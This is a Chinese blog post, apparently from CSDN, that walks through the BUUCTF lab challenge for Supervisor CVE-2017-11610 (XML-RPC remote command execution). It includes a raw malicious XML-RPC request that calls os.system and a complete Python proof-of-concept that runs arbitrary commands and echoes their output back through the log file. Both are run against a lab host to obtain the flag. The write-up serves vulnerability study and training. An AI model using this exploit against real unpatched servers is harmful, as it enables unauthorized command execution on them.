buuctf [Supervisor]CVE-2017-11610

最新推荐文章于 2024-01-19 12:26:31 发布
最新推荐文章于 2024-01-19 12:26:31 发布
阅读量272 收藏 1
点赞数
分类专栏: buuctf real 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/115286704
版权

漏洞描述

Supervisor是一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。
https://blog.csdn.net/qq_37964989/article/details/89454076

漏洞影响

supervisor 3.0.1之前的版本,3.1.4之前的3.1.x版本,3.2.4之前的3.2.x版本,3.3.3之前的3.3.x版本。

漏洞复现

在这里插入图片描述
直接执行任意命令:

POST /RPC2 HTTP/1.1
Host: node3.buuoj.cn:29053
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=1785a4ff130456-0f22e64e92af97-4c3f227c-1fa400-1785a4ff131385; qSq_sid=TwroyT; qSq_visitedfid=2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 215

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>

在这里插入图片描述
命令执行成功

直接回显的POC

#!/usr/bin/env python3
import xmlrpc.client
import sys


target = sys.argv[1]
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
    old = getattr(proxy, 'supervisor.readLog')(0,0)

    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
    result = getattr(proxy, 'supervisor.readLog')(0,0)

    print(result[len(old):])

python exp.py “http://node3.buuoj.cn:29053” “ls”
在这里插入图片描述
python exp.py “http://node3.buuoj.cn:29053” “env” 拿到flag
在这里插入图片描述

exploitsec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Supervisord 远程命令执行漏洞CVE-2017-11610
weixin_51387754的博客
06-03 704
Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd。
Supervisord远程命令执行漏洞分析(CVE-2017-11610
zzkk_的博客
08-10 5595
Supervisord是一款由Python语言开发,用于管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。 近期,Supervisord曝出了一个需认证的远程命令执行漏洞CVE-2017-11610),通过POST请求Supervisord管理界面恶意数据,可以获取服务器操作权限,存在严重的安全风险。 Supervisor介绍 Supervisor 是基于 Pyt
远程桌面漏洞poc_Supervisord 远程代码执行漏洞CVE201711610漏洞复现
weixin_39730263的博客
12-10 158
漏洞信息Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进程状态的功能,在进程异常退出时能够自动重启进程。Supervisord在配置了Web接口后,服务器会启动一个XMLRPC服务器,端口号为9001,利用本漏洞,在获取接口访问权限后,远程攻击者可利用发送一段...
利用CVE-2021-432671
08-08
这种内存破坏可能允许攻击者执行任意代码,尤其是在存在 SMEP(Supervisor Mode Execution Protection)、SMAP(Supervisor Mode Access Prevention)、KASLR(Kernel Address Space Layout Randomization)和 KPTI...
supervisor-event-listener:Supervisor事件通知, 支持邮件, Slack, WebHook
05-15
supervisor-event-listener Supervisor事件通知, 支持邮件, Slack, WebHook 简介 Supervisor是*nix环境下的进程管理工具, 可以把前台进程转换为守护进程, 当进程异常退出时自动重启. supervisor-event-listener监听...
supervisor-3.4.0.tar.gz
02-25
`supervisor-3.4.0.tar.gz` 是一个压缩包文件,其中包含了 `supervisor` 的3.4.0版本。`supervisor` 是一个用Python编写的进程管理工具,它能让你在Linux系统中方便地管理和控制后台进程。在IT行业中,`supervisor` ...
supervisor-3.1.4-1.el7
12-11
supervisor-3.1.4-1.el7.noarch.rpm(linux),有的可以积分下载
supervisor-离线安装包
10-11
首先,`supervisor-4.2.2.tar.gz` 是Supervisor的核心安装包。解压后,你可以找到源代码,并通过编译和配置来安装。通常,安装过程包括解压、编译、安装和配置等步骤。例如: 1. 解压:`tar -zxvf supervisor-4.2.2...
Supervisord 远程代码执行漏洞CVE-2017-11610漏洞复现
OKAY_TC的博客
04-22 3942
复现视频链接:https://www.ichunqiu.com/course/58895 如下内容为复现及笔记 Supervisord 远程代码执行漏洞CVE-2017-11610漏洞复现 0x01 漏洞信息 Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进...
入侵防御漏洞复现(三)
szdx1043的博客
01-19 457
反弹shell就是一种入侵行为,主要表现为本地主机主动连接远端的攻击者,这样远端攻击者会获得本地主机的执行环境,拥有所有权限,可以任意执行命令,如图2所示。
Vulhub Supervisord 远程命令执行漏洞复现
weixin_53696027的博客
06-07 277
Vulhub Supervisord 远程命令执行漏洞复现
python supervisord 远程命令执行漏洞CVE-2017-11610
whatday的专栏
06-27 754
Supervisord Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd。 我觉得它相比Systemd有几个特点: 配置比较简单 一个简单的第三方应用,与系统没有耦合 提供HTTP API,支持远程操作 所以,我之前把他用来跑一些Web应用。 Supervisord的架构分为Server和Client,Server以一个服务的形式,跑在系统后台,而Client是一个命令行工具,其实就是根据用户的要求,调用Server提供的A
Supervisord远程命令执行漏洞(CVE-2017-11610)
谢公子的博客
09-20 2974
目录 Supervisor 漏洞复现 修复建议 Supervisor Supervisor是使用Python 开发的进程管理程序,一般使用命令行进行管理,当然也能通过web接口图形化管理服务。在配置了web接口后,服务器会启动一个XML RPC服务器,端口为9001,默认配置接口是不需要密码访问的,管理员也可设置为密码访问。利用本漏洞,在获取该接口的访问权限后,远程攻击者可发送一段精心构...
supervisor入门到精通
weixin_30662011的博客
12-27 186
1.介绍 Supervisor是基于 Python 的进程管理工具,只能运行在 Unix-Like 的系统上,也就是无法运行在 Windows 上。Supervisor 官方版目前只能运行在 Python 2.4 以上版本,但是还无法运行在 Python 3 上,不过已经有一个 Python 3 的移植版supervisor-py3k。 在一个分布式环境中,每台机器上可能需要启动和停止多个...
buuctf [Weblogic]CVE-2017-10271
qq_1873822的博客
03-24 671
漏洞描述 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器 的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。 https://blog.csdn.net/yumengzth/article/details/97522783 https://www.freebuf.com/colum
漏洞公告】CVE-2017-11610:Supervisord 远程命令执行漏洞
CS13522431352的博客
08-09 679
Supervisord是一款由Python语言开发,用于管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。 近期,Supervisord曝出了一个需认证的远程命令执行漏洞CVE-2017-11610),通过POST请求Supervisord管理界面恶意数据,可以获取服务器操作权限,存在严重的安全风险。
cnpm i supervisor -g
最新发布
04-09
cnpm i supervisor -g 是一个命令,用于在Node.js环境中全局安装supervisor模块。supervisor是一个监视器工具,可以在开发过程中自动监视文件的变化并重新启动应用程序,从而提高开发效率。 supervisor的安装命令是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值